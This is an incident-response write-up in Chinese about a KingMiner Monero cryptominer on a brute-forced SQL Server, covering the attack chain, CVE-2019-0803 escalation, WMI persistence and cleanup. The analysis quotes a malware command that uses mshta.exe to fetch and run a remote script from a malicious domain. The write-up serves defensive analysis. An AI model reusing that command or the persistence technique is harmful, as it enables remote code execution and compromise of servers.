扫码领资料

获网安教程

免费&进群

事件背景

忙碌了一天的沐师傅正准备下班，突然一个电话响起XX局被通报《"恶意外连"事件》，需要马上前往客户现场进行应急排查。于是乎沐师傅Wuwuuwu～，背起书包奔赴客户现场。

应急排查

沟通交流

到达现场后，通过与运维人员沟通了解事件原委：客户收到了上级通报称本单位有服务器/主机IP为111.x.x.x存在与恶意域名news.g23xxx.com进行通信行为，疑似遭受木马病毒攻击，需要应急排查事情原委，定位存在异常的主机/服务器。

定位异常主机/服务器

得知IP x.x.x.x为客户互联网出口IP地址，且互联网出入口侧无态势等流量检测设备，通过排查负载、IPS、深信服上网行为管理等日志均未发现内网主机服务器与恶意域名news.g23xxx.com、解析IP（154.x.x.x）相关访问日志。
恶意域名进行分析后发现该恶意域名在威胁情报上被标记为KingMiner挖矿木马，僵尸网络，远控服务器。

对该恶意域名下的木马样本进行粗略查看，判断该挖矿木马是通过UDP协议进行通信，于是想了个办法，用Wireshark旁路到互联网出口上，抓取互联网出口侧全流量，对流量进行过滤筛选udp && frame.contains "g23xxx"，终于发现存在恶意外连的流量请求，成功定位到异常服务器，内网IP地址为10.10.10.10（数据共享平台），为一台SQL Server数据库服务器。

上机排查

遂即上机进行排查，进行日志、样本的提取，经过分析日志发现该主机存在大量恶意Powershell进程

在SQL Server数据库日志中发现该服务器在2022年3月4日11:17:02到2022年5月7日 21:45:15期间遭受来自境外恶意IP 62.x.x.x（俄罗斯莫斯科）、62.x.x.x（俄罗斯莫斯科）大量爆破行为，最终爆破成功。


当数据库爆破成功后，该IP在服务器上执行了VBS脚本下载经过base64编码的二进制blob文件，经过解码后保存为C:\\Users\\Public\\Downloads\\\\tool.exe


经过分析该文件tool.exe运行后会利用Windows权限提升漏洞CVE-2019-0803进行攻击，成功利用此漏洞的攻击者可以在内核模式下运行任意代码，然后可以安装程序；查看、更改或删除数据；或创建具有完全用户权限的新帐户。tool.exe在特权模式下执行命令mshta.exe vbscript:GetObject(\\"script:http\[:\]//aa.30583fdae.tk/r1.txt\\")(window.close)，通过mshta.exe执行脚本r1.txt来进行持久化。其中tool.exe所请求域名aa.30583xxxx.tk为门罗币挖矿木马地址，威胁情报已标记为恶意：

Tool.exe文件沙箱分析结果：

行为分析：

行为分析图：

程序运行示例图：

其中下载的r1.txt会配置名为WindowsSystemUpdate \_WMITimer的计时器，并将执行一段脚本代码的事件消费者WindowsSystemUpdate\_consumer通过事件过滤器WindowsSystemUpdate\_filter绑定到计时器，从而通过计时器每15分钟执行一次下面的VBS脚本代码：

WMI定时任务存在并已清除

后续继续跟进分析发现，可能由于挖矿木马解析IP地址变更，或恶意域名不可达等原因，造成挖矿木马所需的部分程序或脚本未能成功下载到本地，经过排查，仅发现此处tool.exe所创建的wmi启动项，定时通过nslookup查询恶意域名"news.g23xxx.com" DNS记录，造成本服务器访问恶意域名"news.g23xxx.com"触发恶意外连告警。

在此次分析过程中，还发现该服务器还存在其他木马病毒，均已提取出样本并清除：


至此，此次事件初步排查完成，客户已对该服务器进行断网处理，经过全盘木马病毒查杀，启动项删除，并在防火墙上封禁了该恶意域名与IP地址。

应急事件总结

【被攻击服务器】：SQL Server服务器，数据共享平台
【攻击链路】：攻击者针对Windows服务器MSSQL进行爆破攻击，爆破入侵成功后，首先执行一段VBS脚本，检测操作系统版本，并根据不同的系统版本下载不同的Payload文件，利用下载的文件tool.exe进行(CVE-2019-0803)提权以及门罗币挖矿。同时还会安装WMI定时器和Windows计划任务来反复执行指定脚本，执行服务器返回的恶意代码达到持久化攻击的目的；
【木马病毒类型】：挖矿木马，挖矿类型：KingMiner门罗币；
【安全设备运行情况】：IPS、深信服上网行为管理、服务器本地“火绒”杀毒软件未检测出异常；
【处置情况】：已成功定位存在异常的内网服务器，已做断网处理，已进行全盘查杀、日志提取、样本提取等工作，客户反馈该服务器已闲置，后续不再投入使用；
【持续监控】：后续将部署态势感知设备，对恢复后的网站持续监测。

作者：奇安信攻防社区【F1ne】转载自：https://forum.butian.net/share/2139

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

（hack视频资料及工具）

（部分展示）